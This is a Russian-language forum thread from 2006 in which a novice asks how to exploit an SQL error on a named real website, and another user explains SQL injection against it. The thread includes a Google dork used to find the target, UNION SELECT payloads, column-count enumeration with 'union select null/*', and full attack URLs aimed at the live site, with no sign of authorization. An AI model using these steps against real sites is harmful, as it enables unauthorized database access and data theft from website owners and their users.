Возможна ли SQl инъекция ?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Возможна ли SQl инъекция ? - 2006-02-21 00:48:48
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Есть некий сайт : www.***.org/new/article.php?id=96
при следующей постановке : www.***.org/new/article.php?id=99999
в браузере выводится сообщение об ошибки:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''and typeid=2 and publish=1 ORDER BY date DESC'' at line 1
при следующей постановке : www.***.org/new/article.php?id=99999''
в браузере выводится сообщение об ошибки:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''''' at line 1
Если не трудно обьесните что из этого можно поиметь ?
В этом виде атаки я новичок
зарание спасибо
Isq:25678965
E-mail: doyoudo@rambler.ru
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 11:34:09
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
SQL-injection возможна. Запрос должен выглядеть примерно так:
article.php?id=9999 union select date,publish,0,0,0,0 from articles
А воббще читай инфу по иньекциям[sm=2.gif]
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 16:54:32
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
ответ:
The used SELECT statements have a different number of columns
как я понял нет прав на SELECT ?
и если не трудно что делает данный запрос
как я понял он выводит столбец с именем date
Если я всё правильно понял ?
Зарание спасибо
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 22:04:10
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Не буду спрашивать как ты это узнал
но это так wwww.xxx.org = www.soaw.org
что уже приходилось иметь с ним дело ?
Зарание спасибо
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 22:09:16
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Так я правильно понял насчёт :
прав на SELECT ?
Зарание спасибо
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 00:12:17
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
Нашёл я его легко! Обычный запрос в гугле inurl:".org/new/article.php?id=96"
The used SELECT statements have a different number of columns озночает, что
тебе надо подобрать число столбцов![sm=2.gif]
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 12:44:20
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Как я понял date,publish - это имя столбца
Я попробовал на примере доков менять место полдожение date,publish
так:
article.php?id=9999 union select date,publish,0,0,0,0 from articles
article.php?id=9999 union select 0,date,publish,0,0,0 from articles
article.php?id=9999 union select 0,0,date,publish,0,0 from articles
и т.к но ответ всё тот же
The used SELECT statements have a different number of columns
скорее всего я не так понял
если не трудно обьясни попадробнее
А то я не очень в ехал
Зарание терабайтное спасибо
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 13:05:17
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
Тебе надо сначала узнать кол-во столбцов в таблице:
arcticles.php?id=99 union select null/*
arcticles.php?id=99 union select null,null/*
И так до тех пор пока с экрана не уберётся надпись
The used SELECT statements have a different number of columns
|
|
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 16:47:46
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
я пробивал до :
http://www.soaw.org/new/article.php?id=9999%20union%20select%20%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
но ответ везде одинаков :
The used SELECT statements have a different number of columns
Что делать Далее ?
[sm=em88.gif][sm=12.gif][sm=em88.gif]
Зарание спасибо
|
|
|
|
|
|
